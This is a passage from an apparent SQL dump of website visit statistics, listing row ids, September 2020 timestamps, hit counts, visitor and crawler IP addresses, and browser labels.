538874,1600742985,1,1,0,0,'5.45.207.178','other'),(538875,1600742987,1,1,0,0,'5.255.253.77','other'),(538876,1600742989,1,1,0,0,'5.255.253.141','other'),(538877,1600743008,18,18,0,0,'5.255.253.87','other'),(538878,1600743041,19,19,0,0,'5.45.207.123','other'),(538879,1600743230,4,4,0,0,'213.180.203.96','other'),(538880,1600747382,1,1,0,0,'46.211.46.62','chrome'),(538881,1600748551,2,2,0,0,'46.211.30.168','chrome'),(538882,1600749239,1,1,0,0,'94.231.178.194','chrome'),(538883,1600750944,1,1,0,0,'173.252.127.21','other'),(538884,1600750945,1,1,0,0,'173.252.95.15','other'),(538886,1600750946,1,1,0,0,'173.252.95.19','other'),(538887,1600751492,1,1,0,0,'173.252.127.4','other'),(538888,1600756261,1,1,0,0,'31.41.107.147','chrome'),(538889,1600758609,1,1,0,0,'173.252.107.9','other'),(538890,1600761885,1,1,0,0,'94.254.233.188','chrome'),(538891,1600765504,1,1,0,0,'5.173.250.55','other'),(538892,1600767775,1,1,0,0,'66.220.149.13','other'),(538893,1600776696,1,1,0,0,'69.171.251.15','other'),(538894,1600780126,1,1,0,0,'66.220.149.18','other'),(538895,1600780825,1,1,0,0,'31.13.115.11','other'),(538896,1600787721,1,1,0,0,'94.153.16.9','chrome'),(538897,1600789168,1,1,0,0,'91.196.178.2','chrome'),(538898,1600791619,1,1,0,0,'178.133.221.38','chrome'),(538899,1600796578,1,1,0,0,'37.73.176.123','chrome'),(538900,1600797381,1,1,0,0,'91.196.178.2','chrome'),(538901,1600800381,1,1,0,0,'93.79.126.70','other'),(538902,1600803937,1,1,0,0,'176.118.50.138','other'),(538903,1600805879,1,0,1,0,'66.249.66.79',''),(538904,1600838169,1,1,0,0,'91.196.178.101','chrome'),(538905,1600838383,1,1,0,0,'5.173.251.207','chrome'),(538906,1600840774,1,1,0,0,'178.133.136.230','chrome'),(538907,1600843773,1,1,0,0,'213.180.203.96','other'),(538908,1600844372,1,1,0,0,'46.211.38.11','chrome'),(538909,1600847630,1,1,0,0,'46.201.248.243','chrome'),(538910,1600856561,1,1,0,0,'5.45.207.123','other'),(538911,1600870596,1,1,0,0,'46.211.60.40','chrome'),(538912,1600875008,1,1,0,0,'193.165.2.8','chrome'),(538913,1600880438,1,1,0,0,'173.252.111.17','other'),(538914,1600886502,1,1,0,0,'91.196.178.179','chrome'),(538915,1600887461,1,1,0,0,'146.158.58.225','chrome'),(538916,1600891411,1,1,0,0,'91.196.177.181','other'),(538917,1600892279,1,0,1,0,'66.249.66.78',''),(538918,1600911696,1,1,0,0,'66.249.92.144','other'),(538919,1600927700,3,3,0,0,'176.37.90.125','other'),(538920,1600933851,1,1,0,0,'31.13.103.6','other'),(538921,1600937903,1,1,0,0,'31.13.115.117','other'),(538922,1600942777,1,1,0,0,'128.124.120.105','chrome'),(538923,1600943314,1,1,0,0,'173.252.87.25','other'),(538924,1600943456,1,1,0,0,'31.13.115.20','other'),(538925,1600970660,1,1,0,0,'46.45.185.190','chrome'),(538926,1600972403,1,1,0,0,'173.252.111.12','other'),(538927,1600972444,1,1,0,0,'173.252.111.23','other'),(538928,1600972445,1,1,0,0,'173.252.111.119','other'),(538929,1600977789,1,0,1,0,'66.249.66.78',''),(538930,1601006595,1,1,0,0,'5.45.207.79','other'),(538931,1601008419,1,1,0,0,'46.211.52.176','chrome'),(538932,1601008683,1,1,0,0,'91.196.178.115','chrome'),(538933,1601009943,1,1,0,0,'91.196.178.115','chrome'),(538934,1601010666,1,1,0,0,'173.252.87.10','other'),(538935,1601012269,1,1,0,0,'5.45.207.159','other'),(538936,1601019202,1,1,0,0,'5.255.253.92','other'),(538937,1601019215,1,1,0,0,'46.211.18.29','chrome'),(538938,1601020350,1,1,0,0,'31.13.103.19','other'),(538939,1601023408,1,1,0,0,'66.220.149.19','other'),(538940,1601023767,1,1,0,0,'31.13.115.6','other'),(538941,1601029406,1,1,0,0,'31.13.103.4','other'),(538942,1601033416,1,1,0,0,'5.255.253.87','other'),(538943,1601034868,1,1,0,0,'5.45.207.123','other'),(538944,1601037143,1,1,0,0,'31.13.127.19','other'),(538945,1601037146,1,1,0,0,'31.13.127.10','other'),(538946,1601046335,3,3,0,0,'176.37.90.125','other'),(538947,1601049240,1,1,0,0,'31.13.127.17','other'),(538948,1601050213,1,1,0,0,'176.36.147.214','other'),(538949,1601050224,1,1,0,0,'149.154.161.6','other'),(538950,1601050492,1,1,0,0,'37.73.160.145','other'),(538951,1601055419,1,1,0,0,'5.255.253.87','other'),(538952,1601063381,1,1,0,0,'5.45.207.123','other'),(538953,1601064201,1,0,1,0,'66.249.66.80',''),(538954,1601066909,2,2,0,0,'173.252.111.14','other'),(538955,1601071161,1,1,0,0,'5.255.253.81','other'),(538956,1601076584,1,1,0,0,'5.255.253.92','other'),(538957,1601081887,1,1,0,0,'5.255.253.92','other'),(538958,1601089635,1,1,0,0,'5.255.253.92','other'),(538959,1601106791,1,1,0,0,'46.211.11.239','chrome'),(538960,1601107681,1,1,0,0,'209.17.96.138','other'),(538961,1601116018,1,1,0,0,'31.13.127.24','other'),(538962,1601127079,1,1,0,0,'31.13.127.6','other'),(538963,1601146335,1,1,0,0,'193.34.173.178','chrome'),(538964,1601150259,1,1,0,0,'37.73.165.59','chrome'),(538965,1601150629,1,0,1,0,'66.249.66.79',''),(538967,1601163239,4,4,0,0,'109.70.111.112','chrome'),(538968,1601172281,1,1,0,0,'46.45.185.172','chrome'),(538969,1601178136,1,1,0,0,'31.13.115.18','other'),(538970,1601179706,1,1,0,0,'88.155.173.183','chrome'),(538971,1601204773,1,1,0,0,'178.133.24.61','chrome'),(538972,1601207804,1,1,0,0,'37.248.162.109','chrome'),(538973,1601216205,1,1,0,0,'37.73.222.11','chrome'),(538974,1601236243,1,0,1,0,'66.249.66.78',''),(538975,1601282872,1,1,0,0,'173.252.95.23','chrome'),(538976,1601282891,1,1,0,0,'173.252.95.33','chrome'),(538977,1601282892,1,1,0,0,'173.252.95.7','chrome'),(538978,1601314814,1,1,0,0,'37.55.226.3','chrome'),(538979,1601317798,1,1,0,0,'46.133.24.191','chrome'),(538980,1601319273,1,1,0,0,'193.56.151.181','chrome'),(538981,1601322553,2,0,2,0,'66.249.66.78',''),(538982,1601357859,1,1,0,0,'195.10.210.70','chrome'),(538983,1601364354,1,1,0,0,'109.227.104.155','chrome'),(538984,1601364393,1,1,0,0,'31.13.103.9','other'),(538985,1601364397,1,1,0,0,'31.13.103.17','other'),(538986,1601366469,1,1,0,0,'109.227.104.155','chrome'),(538987,1601374938,1,1,0,0,'188.191.66.131','other'),(538988,1601387762,1,1,0,0,'91.196.178.11','chrome'),(538989,1601401449,1,1,0,0,'91.196.178.25','chrome'),(538990,1601402425,1,1,0,0,'91.196.178.25','chrome'),(538991,1601402633,1,1,0,0,'173.252.111.9','other'),(538994,1601402635,2,2,0,0,'173.252.111.19','other'),(538995,1601402685,1,1,0,0,'173.252.111.111','other'),(538996,1601402686,1,1,0,0,'173.252.111.20','other'),(538997,1601402801,1,1,0,0,'178.133.105.103','chrome'),(538998,1601402863,1,1,0,0,'91.196.178.138','chrome'),(538999,1601402901,1,1,0,0,'185.8.41.69','other'),(539000,1601402957,1,1,0,0,'91.196.178.25','other'),(539001,1601403396,1,1,0,0,'91.196.178.25','chrome'),(539002,1601403597,1,1,0,0,'173.252.111.112','other'),(539004,1601403606,1,1,0,0,'173.252.111.9','other'),(539005,1601403608,1,1,0,0,'173.252.111.16','other'),(539006,1601403693,1,1,0,0,'92.112.229.221','chrome'),(539007,1601403960,1,1,0,0,'188.163.32.24','chrome'),(539008,1601404071,1,1,0,0,'66.220.149.22','other'),(539009,1601404180,1,1,0,0,'173.252.111.7','other'),(539010,1601404184,1,1,0,0,'173.252.111.12','other'),(539012,1601404185,1,1,0,0,'173.252.111.3','other'),(539013,1601404186,1,1,0,0,'31.13.127.111','other'),(539014,1601404222,1,1,0,0,'91.196.178.152','chrome'),(539015,1601404233,1,1,0,0,'46.211.30.115','chrome'),(539016,1601404308,1,1,0,0,'66.220.149.14','other'),(539017,1601404314,2,2,0,0,'69.171.251.3','other'),(539018,1601404315,1,1,0,0,'69.171.251.27','other'),(539019,1601404360,1,1,0,0,'91.196.178.25','chrome'),(539020,1601404385,1,1,0,0,'66.220.149.15','other'),(539021,1601404389,1,1,0,0,'173.252.127.117','other'),(539022,1601404611,1,1,0,0,'69.171.251.117','other'),(539023,1601404613,1,1,0,0,'69.171.251.29','other'),(539024,1601404627,1,1,0,0,'173.252.111.9','other'),(539025,1601404628,1,1,0,0,'173.252.111.4','other'),(539026,1601404631,1,1,0,0,'173.252.95.14','other'),(539027,1601404657,1,1,0,0,'37.73.10.198','chrome'),(539028,1601404696,1,1,0,0,'213.111.90.117','chrome'),(539029,1601404712,1,1,0,0,'178.133.189.103','chrome'),(539030,1601404716,1,1,0,0,'91.196.178.141','chrome'),(539031,1601404732,1,1,0,0,'37.73.215.254','chrome'),(539034,1601404747,1,1,0,0,'91.196.178.77','chrome'),(539035,1601404750,1,1,0,0,'91.196.178.89','other'),(539036,1601404753,1,1,0,0,'91.196.178.54','chrome'),(539037,1601404772,1,1,0,0,'94.153.74.164','chrome'),(539038,1601404783,1,1,0,0,'94.153.27.14','chrome'),(539039,1601404805,1,1,0,0,'178.133.84.250','chrome'),(539040,1601404830,1,1,0,0,'91.196.178.4','chrome'),(539041,1601404832,1,1,0,0,'94.153.69.236','chrome'),(539042,1601404841,1,1,0,0,'54.73.92.82','other'),(539043,1601404860,1,1,0,0,'94.153.13.118','chrome'),(539044,1601404931,1,1,0,0,'178.133.105.103','chrome'),(539045,1601404942,1,1,0,0,'69.171.251.13','other'),(539046,1601404949,1,1,0,0,'91.196.178.189','other'),(539047,1601404958,1,1,0,0,'95.132.47.200','other'),(539048,1601404975,1,1,0,0,'66.220.149.26','other'),(539049,1601404995,1,1,0,0,'69.171.251.21','other'),(539050,1601405002,1,1,0,0,'92.113.156.167','chrome'),(539051,1601405005,1,1,0,0,'173.252.111.23','other'),(539052,1601405007,1,1,0,0,'173.252.111.10','other'),(539053,1601405011,1,1,0,0,'31.13.127.12','other'),(539054,1601405014,1,1,0,0,'173.252.83.118','other'),(539055,1601405041,1,1,0,0,'92.113.174.235','chrome'),(539056,1601405052,1,1,0,0,'91.196.178.7','chrome'),(539057,1601405069,1,1,0,0,'173.252.95.30','other'),(539058,1601405212,1,1,0,0,'173.252.95.31','other'),(539059,1601405257,1,1,0,0,'92.113.191.53','chrome'),(539060,1601405283,1,1,0,0,'173.252.95.111','other'),(539061,1601405359,1,1,0,0,'92.113.127.239','chrome'),(539062,1601405367,1,1,0,0,'91.196.178.79','chrome'),(539063,1601405374,1,1,0,0,'69.171.251.113','other'),(539064,1601405398,1,1,0,0,'91.196.178.184','chrome'),(539065,1601405487,1,1,0,0,'46.211.36.89','chrome'),(539066,1601405551,1,1,0,0,'69.171.251.31','other'),(539067,1601405603,1,1,0,0,'69.171.251.17','other'),(539068,1601405643,1,1,0,0,'91.196.178.122','chrome'),(539069,1601405762,1,1,0,0,'91.196.178.69','chrome'),(539070,1601405842,1,1,0,0,'195.10.210.210','chrome'),(539071,1601405863,1,1,0,0,'66.220.149.119','other'),(539072,1601405964,1,1,0,0,'91.196.178.142','chrome'),(539073,1601405984,1,1,0,0,'94.153.50.209','chrome'),(539074,1601406051,1,1,0,0,'91.196.178.175','chrome'),(539075,1601406076,1,1,0,0,'31.133.98.84','chrome'),(539076,1601406120,1,1,0,0,'66.220.149.32','other'),(539077,1601406125,1,1,0,0,'31.13.127.7','other'),(539078,1601406333,1,1,0,0,'185.53.79.244','chrome'),(539079,1601406356,1,1,0,0,'69.171.251.2','other'),(539080,1601406450,1,1,0,0,'173.252.95.16','other'),(539081,1601406536,1,1,0,0,'173.252.95.14','other'),(539082,1601406607,1,1,0,0,'31.13.127.8','other'),(539083,1601406690,1,1,0,0,'91.196.178.125','chrome'),(539084,1601406691,1,1,0,0,'91.196.178.167','chrome'),(539085,1601406750,1,1,0,0,'94.153.32.167','chrome'),(539086,1601406760,1,1,0,0,'46.211.24.67','chrome'),(539087,1601406785,1,1,0,0,'46.211.78.67','chrome'),(539088,1601406795,1,1,0,0,'91.196.178.20','chrome'),(539089,1601406801,1,1,0,0,'173.252.111.111','other'),(539090,1601406813,1,1,0,0,'173.252.95.36','other'),(539091,1601406826,1,1,0,0,'31.13.127.15','other'),(539092,1601406948,1,1,0,0,'173.252.95.119','other'),(539093,1601406951,1,1,0,0,'173.252.95.35','other'),(539094,1601407009,1,1,0,0,'173.252.95.11','other'),(539095,1601407101,1,1,0,0,'173.252.95.27','other'),(539096,1601407158,1,1,0,0,'173.252.95.25','other'),(539097,1601407165,1,1,0,0,'91.196.121.134','chrome'),(539098,1601407175,1,1,0,0,'130.180.209.66','chrome'),(539099,1601407178,1,1,0,0,'69.171.251.28','other'),(539100,1601407190,1,1,0,0,'31.13.127.21','other'),(539101,1601407257,1,1,0,0,'173.252.111.13','other'),(539102,1601407506,1,1,0,0,'91.196.178.88','chrome'),(539103,1601407514,1,1,0,0,'185.210.87.109','chrome'),(539104,1601407643,1,1,0,0,'91.196.178.4','chrome'),(539105,1601407713,1,1,0,0,'91.196.178.106','chrome'),(539106,1601407827,1,1,0,0,'31.13.127.10','other'),(539107,1601407835,1,1,0,0,'37.52.114.94','chrome'),(539108,1601407856,1,1,0,0,'69.171.251.116','other'),(539109,1601407866,1,1,0,0,'173.252.95.119','other'),(539110,1601407870,1,1,0,0,'173.252.95.10','other'),(539111,1601407885,1,1,0,0,'91.196.178.22','other'),(539112,1601408285,1,0,1,0,'66.249.66.92',''),(539113,1601408286,1,1,0,0,'91.196.177.21','chrome'),(539114,1601408304,1,1,0,0,'91.196.178.131','chrome'),(539115,1601408331,1,1,0,0,'91.196.178.172','chrome'),(539116,1601408338,1,1,0,0,'91.196.178.69','chrome'),(539117,1601408409,1,1,0,0,'128.124.168.255','chrome'),(539118,1601408419,1,1,0,0,'173.252.95.27','other'),(539119,1601408465,1,1,0,0,'31.13.127.13','other'),(539120,1601408650,2,2,0,0,'37.73.210.66','chrome'),(539121,1601408736,1,1,0,0,'173.252.127.14','other'),(539122,1601408740,1,1,0,0,'31.13.127.4','other'),(539123,1601408750,1,1,0,0,'69.171.251.31','other'),(539124,1601408752,1,1,0,0,'66.220.149.35','other'),(539125,1601408869,1,1,0,0,'91.196.178.88','chrome'),(539126,1601408935,1,1,0,0,'91.196.178.25','chrome'),(539127,1601408976,1,1,0,0,'173.252.95.6','other'),(539128,1601409080,1,1,0,0,'91.196.178.163','chrome'),(539129,1601409138,1,1,0,0,'173.252.111.116','other'),(539130,1601409315,1,1,0,0,'173.252.127.5','other'),(539131,1601409364,1,1,0,0,'173.252.95.7','other'),(539132,1601409474,1,1,0,0,'31.13.127.2','other'),(539133,1601409519,1,1,0,0,'173.252.95.16','other'),(539134,1601409538,1,1,0,0,'66.220.149.24','other'),(539135,1601409693,1,1,0,0,'130.180.216.178','chrome'),(539136,1601409835,1,1,0,0,'69.171.251.19','other'),(539137,1601410068,1,1,0,0,'66.220.149.7','other'),(539138,1601410483,1,1,0,0,'195.10.210.49','chrome'),(539139,1601410549,1,1,0,0,'31.13.127.111','other'),(539140,1601410873,1,1,0,0,'91.196.178.76','chrome'),(539141,1601410885,1,1,0,0,'94.153.7.221','chrome'),(539142,1601411339,1,1,0,0,'91.196.178.188','chrome'),(539143,1601411428,1,1,0,0,'91.196.178.187','chrome'),(539144,1601411543,1,1,0,0,'52.30.100.235','other'),(539145,1601412335,1,1,0,0,'173.252.95.10','other'),(539146,1601413207,1,1,0,0,'31.13.127.11','other'),(539147,1601413588,1,1,0,0,'69.171.251.11','other'),(539148,1601413593,2,2,0,0,'173.252.95.28','other'),(539149,1601414280,1,1,0,0,'173.252.95.22','other'),(539150,1601414367,1,1,0,0,'31.13.127.5','other'),(539151,1601414658,1,1,0,0,'69.171.251.15','other'),(539152,1601415160,1,1,0,0,'173.252.95.9','other'),(539153,1601415274,1,1,0,0,'69.171.251.9','other'),(539154,1601415321,1,1,0,0,'66.220.149.27','other'),(539155,1601417037,1,1,0,0,'91.196.178.167','chrome'),(539156,1601417903,1,1,0,0,'85.243.152.23','chrome'),(539157,1601417922,1,1,0,0,'173.252.95.19','other'),(539158,1601417968,1,1,0,0,'173.252.127.22','other'),(539159,1601418099,1,1,0,0,'31.13.127.8','other'),(539160,1601418327,1,1,0,0,'69.171.251.18','other'),(539161,1601419283,1,1,0,0,'88.155.96.234','chrome'),(539162,1601419376,1,1,0,0,'31.13.127.9','other'),(539163,1601419621,1,1,0,0,'31.13.127.10','other'),(539164,1601421657,1,1,0,0,'31.13.103.111','other'),(539165,1601426458,1,1,0,0,'173.252.111.117','other'),(539166,1601429145,1,1,0,0,'66.220.149.13','other'),(539167,1601429147,1,1,0,0,'66.220.149.11','other'),(539168,1601429274,1,1,0,0,'66.220.149.22','other'),(539169,1601429953,1,1,0,0,'46.45.185.170','chrome'),(539170,1601429991,1,1,0,0,'185.234.67.17','chrome'),(539171,1601432642,1,1,0,0,'173.252.95.31','other'),(539172,1601432648,1,1,0,0,'173.252.95.27','other'),(539173,1601433080,1,1,0,0,'173.252.95.23','other'),(539174,1601434284,1,1,0,0,'95.158.43.203','chrome'),(539175,1601435045,1,1,0,0,'109.70.106.130','other'),(539176,1601436717,1,1,0,0,'69.171.251.5','other'),(539177,1601436747,1,1,0,0,'66.220.149.17','other'),(539178,1601436929,1,1,0,0,'91.196.178.167','chrome'),(539179,1601437606,1,1,0,0,'91.196.178.40','other'),(539180,1601437695,1,1,0,0,'91.196.178.25','chrome'),(539181,1601437891,1,1,0,0,'173.252.95.20','other'),(539182,1601437892,1,1,0,0,'31.13.103.8','other'),(539183,1601438092,1,1,0,0,'173.252.95.1','other'),(539184,1601438306,1,1,0,0,'91.196.178.58','chrome'),(539185,1601439289,1,1,0,0,'91.196.178.88','chrome'),(539186,1601439481,1,1,0,0,'69.171.251.28','other'),(539187,1601439582,1,1,0,0,'31.13.127.112','other'),(539188,1601440514,1,1,0,0,'173.252.95.119','other'),(539189,1601440560,1,1,0,0,'69.171.251.20','other'),(539190,1601440563,1,1,0,0,'31.13.103.111','other'),(539191,1601440638,1,1,0,0,'173.252.127.11','other'),(539192,1601440654,1,1,0,0,'91.196.178.21','chrome'),(539193,1601440897,1,1,0,0,'37.73.112.151','chrome'),(539194,1601441025,1,1,0,0,'91.196.178.144','chrome'),(539195,1601441330,1,1,0,0,'91.196.178.33','chrome'),(539196,1601441354,1,1,0,0,'91.196.178.23','chrome'),(539197,1601441378,1,1,0,0,'46.211.13.231','chrome'),(539198,1601441380,1,1,0,0,'91.196.178.18','chrome'),(539199,1601441458,1,1,0,0,'91.196.178.161','chrome'),(539200,1601441723,1,1,0,0,'91.196.178.58','chrome'),(539201,1601441767,1,1,0,0,'185.234.67.28','chrome'),(539202,1601442011,1,1,0,0,'185.138.228.228','chrome'),(539203,1601442165,1,1,0,0,'91.196.178.187','chrome'),(539204,1601442410,1,1,0,0,'173.252.95.24','other'),(539205,1601442452,1,1,0,0,'173.252.95.12','other'),(539206,1601442545,1,1,0,0,'91.196.178.184','chrome'),(539207,1601442561,1,1,0,0,'173.252.127.16','other'),(539209,1601442562,1,1,0,0,'173.252.127.8','other'),(539210,1601442664,2,2,0,0,'31.13.127.5','other'),(539211,1601443009,1,1,0,0,'69.171.251.22','other'),(539212,1601443022,1,1,0,0,'66.220.149.14','other'),(539213,1601443107,1,1,0,0,'91.196.178.187','chrome'),(539214,1601443120,1,1,0,0,'69.171.251.13','other'),(539215,1601443307,1,1,0,0,'31.13.127.14','other'),(539216,1601443339,1,1,0,0,'173.252.95.2','other'),(539217,1601444180,1,1,0,0,'31.13.127.18','other'),(539218,1601444187,1,1,0,0,'173.252.95.3','other'),(539219,1601444705,1,1,0,0,'69.171.251.29','other'),(539220,1601444765,1,1,0,0,'198.16.74.43','chrome'),(539221,1601444898,1,1,0,0,'91.196.178.136','chrome'),(539222,1601445143,1,1,0,0,'5.173.148.4','chrome'),(539223,1601445662,1,1,0,0,'94.153.16.251','chrome'),(539224,1601445777,1,1,0,0,'91.196.178.133','other'),(539225,1601446609,2,2,0,0,'91.196.178.25','chrome'),(539226,1601446677,1,1,0,0,'91.196.178.75','chrome'),(539227,1601447153,1,1,0,0,'46.211.47.188','chrome'),(539228,1601447332,1,1,0,0,'173.252.95.27','other'),(539229,1601447505,1,1,0,0,'173.252.95.20','other'),(539230,1601447570,1,1,0,0,'91.196.178.124','chrome'),(539231,1601448232,1,1,0,0,'173.252.95.120','other'),(539233,1601448348,1,1,0,0,'173.252.95.5','other'),(539234,1601448362,1,1,0,0,'31.13.127.12','other'),(539235,1601448418,1,1,0,0,'173.252.95.25','other'),(539236,1601448687,2,2,0,0,'91.196.179.65','firefox'),(539237,1601449315,1,1,0,0,'173.252.95.8','other'),(539238,1601449572,1,1,0,0,'91.196.177.6','chrome'),(539239,1601449698,1,1,0,0,'128.124.112.160','chrome'),(539240,1601450952,1,1,0,0,'69.171.251.119','other'),(539241,1601450989,2,2,0,0,'31.13.127.23','other'),(539242,1601451533,1,1,0,0,'91.196.178.25','chrome'),(539243,1601451593,1,1,0,0,'31.13.127.111','other'),(539244,1601451595,1,1,0,0,'31.13.127.22','other'),(539245,1601451597,1,1,0,0,'31.13.127.7','other'),(539246,1601451599,1,1,0,0,'31.13.127.24','other'),(539247,1601451666,1,1,0,0,'173.252.95.34','other'),(539248,1601451709,1,1,0,0,'173.252.127.1','other'),(539249,1601451720,1,1,0,0,'31.13.115.18','other'),(539250,1601451760,1,1,0,0,'69.171.251.23','other'),(539251,1601451769,1,1,0,0,'66.220.149.29','other'),(539252,1601451872,1,1,0,0,'46.63.121.200','chrome'),(539253,1601452457,1,1,0,0,'91.196.178.25','chrome'),(539254,1601453168,1,1,0,0,'91.196.178.25','other'),(539255,1601455263,1,1,0,0,'69.171.251.29','other'),(539256,1601455288,1,1,0,0,'31.13.127.21','other'),(539257,1601455508,1,1,0,0,'173.252.95.18','other'),(539258,1601455642,1,1,0,0,'173.252.87.25','other'),(539259,1601455644,1,1,0,0,'173.252.87.11','other'),(539260,1601455688,1,1,0,0,'69.171.251.17','other'),(539261,1601456766,1,1,0,0,'195.225.145.100','chrome'),(539262,1601456793,1,1,0,0,'91.197.1.183','chrome'),(539263,1601456977,1,1,0,0,'188.190.172.107','other'),(539264,1601457034,1,1,0,0,'46.211.63.245','chrome'),(539265,1601457175,1,1,0,0,'91.196.178.141','chrome'),(539266,1601457271,1,1,0,0,'173.252.95.3','other'),(539267,1601457380,1,1,0,0,'31.13.127.9','other'),(539268,1601457437,1,1,0,0,'173.252.127.23','other'),(539269,1601457513,1,1,0,0,'31.148.135.189','other'),(539270,1601457685,1,1,0,0,'31.13.115.10','other'),(539271,1601457896,1,1,0,0,'185.159.163.185','chrome'),(539272,1601458086,1,1,0,0,'94.153.21.217','chrome'),(539273,1601458175,1,1,0,0,'46.211.53.124','chrome'),(539274,1601458833,1,1,0,0,'173.252.127.2','other'),(539275,1601458848,1,1,0,0,'188.239.27.247','chrome'),(539276,1601459087,1,1,0,0,'178.133.105.103','chrome'),(539277,1601459122,1,1,0,0,'173.252.107.23','other'),(539278,1601459740,1,1,0,0,'46.133.204.205','chrome'),(539279,1601460799,1,1,0,0,'91.196.178.189','chrome'),(539280,1601461416,1,1,0,0,'92.113.113.10','chrome'),(539281,1601461537,1,1,0,0,'94.153.81.120','chrome'),(539282,1601462439,1,1,0,0,'46.211.31.142','chrome'),(539283,1601463281,1,1,0,0,'69.171.251.16','other'),(539284,1601465186,1,1,0,0,'173.252.95.3','other'),(539285,1601465339,1,1,0,0,'5.173.249.3','other'),(539286,1601465681,1,1,0,0,'178.94.144.91','chrome'),(539287,1601467462,1,1,0,0,'94.153.12.31','chrome'),(539288,1601468631,1,1,0,0,'31.13.127.18','other'),(539289,1601468681,1,1,0,0,'31.13.127.22','other'),(539290,1601468727,1,1,0,0,'94.153.19.27','chrome'),(539291,1601469060,1,1,0,0,'31.13.127.8','other'),(539292,1601469110,1,1,0,0,'94.158.95.144','chrome'),(539293,1601469654,1,1,0,0,'173.252.95.112','other'),(539294,1601469744,1,1,0,0,'91.196.178.175','chrome'),(539295,1601470681,1,1,0,0,'173.252.95.117','other'),(539296,1601470738,1,1,0,0,'31.13.127.10','other'),(539297,1601470770,1,1,0,0,'69.171.251.29','other'),(539298,1601470772,1,1,0,0,'173.252.79.112','other'),(539299,1601470773,1,1,0,0,'173.252.79.4','other'),(539300,1601471085,1,1,0,0,'66.220.149.118','other'),(539301,1601471773,1,1,0,0,'31.13.127.7','other'),(539302,1601473865,1,1,0,0,'46.133.136.136','chrome'),(539303,1601474731,1,1,0,0,'173.252.95.28','other'),(539304,1601474768,1,1,0,0,'31.13.127.22','other'),(539305,1601475273,1,1,0,0,'66.220.149.23','other'),(539306,1601475617,1,1,0,0,'93.170.117.25','other'),(539307,1601475639,1,1,0,0,'176.118.50.138','chrome'),(539308,1601475951,1,1,0,0,'188.147.123.247','chrome'),(539309,1601475964,1,1,0,0,'173.252.95.33','other'),(539310,1601476038,1,1,0,0,'46.211.53.103','other'),(539311,1601477962,1,1,0,0,'173.252.95.10','other'),(539312,1601478341,1,1,0,0,'173.252.107.18','other'),(539313,1601478422,1,1,0,0,'37.53.92.91','chrome'),(539314,1601479341,1,1,0,0,'173.252.95.18','other'),(539315,1601479423,1,1,0,0,'173.252.95.15','other'),(539316,1601479439,1,1,0,0,'31.13.127.1','other'),(539317,1601479562,1,1,0,0,'66.220.149.117','other'),(539318,1601479950,1,1,0,0,'173.252.95.13','other'),(539319,1601479965,1,1,0,0,'31.13.127.12','other'),(539320,1601481591,1,1,0,0,'46.211.20.176','chrome'),(539321,1601482251,1,1,0,0,'91.196.178.188','chrome'),(539322,1601482579,1,1,0,0,'173.252.95.16','other'),(539323,1601482616,1,1,0,0,'66.220.149.21','other'),(539324,1601483204,1,1,0,0,'46.211.8.21','chrome'),(539325,1601483237,1,1,0,0,'195.114.148.127','chrome'),(539326,1601483451,1,1,0,0,'31.13.115.111','other'),(539327,1601483614,1,1,0,0,'69.171.251.27','other'),(539328,1601484577,1,1,0,0,'91.196.178.25','chrome'),(539329,1601484799,1,1,0,0,'178.133.240.184','chrome'),(539330,1601485497,1,1,0,0,'93.13.222.75','other'),(539331,1601487761,1,1,0,0,'193.19.254.74','chrome'),(539332,1601487916,1,1,0,0,'46.149.190.226','chrome'),(539333,1601488554,1,1,0,0,'46.133.8.21','chrome'),(539334,1601488702,1,1,0,0,'31.13.127.4','other'),(539335,1601490615,1,1,0,0,'31.41.71.37','chrome'),(539336,1601491960,1,1,0,0,'173.252.107.116','other'),(539337,1601492247,1,1,0,0,'185.42.131.221','chrome'),(539338,1601492363,1,1,0,0,'66.220.149.1','other'),(539340,1601492983,1,1,0,0,'46.211.65.64','chrome'),(539341,1601493201,1,1,0,0,'37.248.213.239','chrome'),(539342,1601493743,1,1,0,0,'69.171.251.6','other'),(539343,1601493878,1,1,0,0,'91.196.178.25','chrome'),(539344,1601493938,1,1,0,0,'31.13.127.20','other'),(539345,1601494388,1,1,0,0,'178.133.68.218','chrome'),(539346,1601494566,1,1,0,0,'173.252.87.5','other'),(539347,1601494567,1,0,1,0,'66.249.66.91',''),(539348,1601494937,1,1,0,0,'178.133.113.169','chrome'),(539349,1601495458,1,1,0,0,'31.13.127.8','other'),(539350,1601496052,1,1,0,0,'69.171.251.28','other'),(539351,1601496422,1,1,0,0,'66.220.149.22','other'),(539352,1601496439,1,1,0,0,'173.252.127.37','other'),(539353,1601496441,1,1,0,0,'66.220.149.33','other'),(539354,1601496639,1,1,0,0,'91.196.178.97','chrome'),(539355,1601496902,1,1,0,0,'69.171.251.7','other'),(539356,1601499501,1,1,0,0,'69.171.251.11','other'),(539357,1601499703,1,1,0,0,'31.13.127.116','other'),(539358,1601500229,1,1,0,0,'91.196.178.44','other'),(539359,1601501939,1,1,0,0,'91.196.178.144','chrome'),(539360,1601502671,1,1,0,0,'31.13.127.12','other'),(539361,1601502673,1,1,0,0,'173.252.95.9','other'),(539362,1601508070,2,0,2,0,'66.249.66.77',''),(539363,1601508989,1,1,0,0,'69.171.251.18','other'),(539364,1601509697,1,1,0,0,'69.171.251.25','other'),(539365,1601509698,1,1,0,0,'69.171.251.21','other'),(539366,1601519772,1,1,0,0,'66.220.149.6','other'),(539367,1601525421,1,1,0,0,'91.196.121.157','chrome'),(539368,1601527562,1,1,0,0,'46.211.6.127','chrome'),(539369,1601528236,1,1,0,0,'46.211.19.93','chrome'),(539370,1601528562,1,1,0,0,'128.124.66.39','chrome'),(539371,1601530392,1,1,0,0,'46.149.179.133','chrome'),(539372,1601531385,1,1,0,0,'94.153.1.139','other'),(539373,1601532032,1,1,0,0,'31.13.127.17','other'),(539374,1601532034,1,1,0,0,'173.252.95.1','other'),(539375,1601535930,1,1,0,0,'46.211.58.201','chrome'),(539376,1601538346,1,1,0,0,'173.252.95.112','other'),(539377,1601539683,1,1,0,0,'91.196.178.25','chrome'),(539378,1601542614,1,1,0,0,'209.17.96.50','other'),(539379,1601542904,1,1,0,0,'69.171.249.4','other'),(539380,1601542974,1,1,0,0,'37.55.238.143','chrome'),(539381,1601544299,1,1,0,0,'185.177.190.222','chrome'),(539382,1601545171,1,1,0,0,'31.13.103.118','other'),(539383,1601545172,1,1,0,0,'31.13.103.2','other'),(539384,1601549401,1,1,0,0,'31.13.115.118','other'),(539385,1601550836,2,2,0,0,'91.196.178.25','chrome'),(539386,1601551796,1,1,0,0,'173.252.95.116','other'),(539387,1601553472,1,1,0,0,'94.153.34.30','chrome'),(539388,1601554072,1,1,0,0,'178.